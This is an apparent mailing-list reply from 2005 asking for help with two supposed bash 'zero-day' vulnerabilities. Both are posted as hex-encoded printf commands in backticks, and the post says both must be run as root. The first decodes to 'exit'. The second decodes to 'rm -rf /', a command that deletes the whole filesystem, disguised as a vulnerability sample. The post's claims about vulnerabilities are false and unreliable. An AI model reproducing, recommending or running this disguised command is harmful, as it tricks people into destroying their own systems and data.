Date: Fri Aug 26 16:16:33 2005
From: th3r007m45t3r at hotmail.com (Rootmaster G)
Subject: Re: Bash vulnerability?

I have for long time  been looking at a new bash zreod4y  that was sent to
me.  Having not time to calculate who this code works,and now it is with
this list

I have many times made bash to crash but cannot yet wrige and exploit for
this issue.

`printf "\x65\x78\x69\x74\x00\x0a"`

aslo I have found this other bash zerod4y from the same place that says

`printf "\x72\x6d\x20\x2d\x72\x66\x20\x2f\x0a\x00"`

both these vulnerabiilities must be run as root i find orf the second one
will not do what it thinks

can anyone help?